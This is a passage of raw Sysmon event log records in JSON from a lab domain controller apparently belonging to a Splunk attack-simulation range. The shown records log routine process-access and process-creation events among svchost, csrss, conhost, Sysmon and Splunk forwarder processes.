\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5981,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.194\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.194","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5982,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.194\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.194","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5983,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.194\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.194","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5984,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.194\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-03E6-5F25-0000-0010E00C0B00}\r\nTargetProcessId: 2476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.194","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-03E6-5F25-0000-0010E00C0B00}","TargetProcessId":"2476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5985,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.945\r\nProcessGuid: {A837DB8D-03E6-5F25-0000-0010A90E0B00}\r\nProcessId: 2460\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.945","ProcessGuid":"{A837DB8D-03E6-5F25-0000-0010A90E0B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5986,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.944\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-03E6-5F25-0000-0010A90E0B00}\r\nTargetProcessId: 2460\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.944","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-03E6-5F25-0000-0010A90E0B00}","TargetProcessId":"2460","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5987,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.944\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-03E6-5F25-0000-0010A90E0B00}\r\nTargetProcessId: 2460\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.944","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-03E6-5F25-0000-0010A90E0B00}","TargetProcessId":"2460","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5988,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.944\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:55:50.944","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:55:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:55:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5989,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:55:50.944\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 